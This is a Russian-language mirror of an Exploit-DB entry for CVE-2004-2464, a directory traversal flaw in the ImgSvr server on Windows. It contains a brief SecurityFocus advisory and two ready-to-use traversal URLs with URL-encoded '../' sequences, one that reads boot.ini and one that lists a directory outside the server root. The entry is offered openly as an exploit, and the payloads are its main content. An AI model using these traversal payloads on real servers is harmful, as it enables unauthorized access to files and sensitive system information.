- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23909
- Проверка EDB
-
- Пройдено
- Автор
- DR_INSANE
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2004-2464
- Дата публикации
- 2004-04-05
Код:
source: https://www.securityfocus.com/bid/10048/info
ImgSvr is prone to an issue that may allow an attacker to view files that reside outside of the server root directory. This issue occurs because the application fails to properly sanitize user-supplied URI data.
A successful exploit may allow a remote attacker to access sensitive information that may be used to launch further attacks against a vulnerable system.
To view a selected file:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2f%2f%2e%2e%2fboot.ini
To list a directory:
http://www.example.com:1234/%2f%2e%2e%2f%2f%2e%2e%2f/- Источник
- www.exploit-db.com
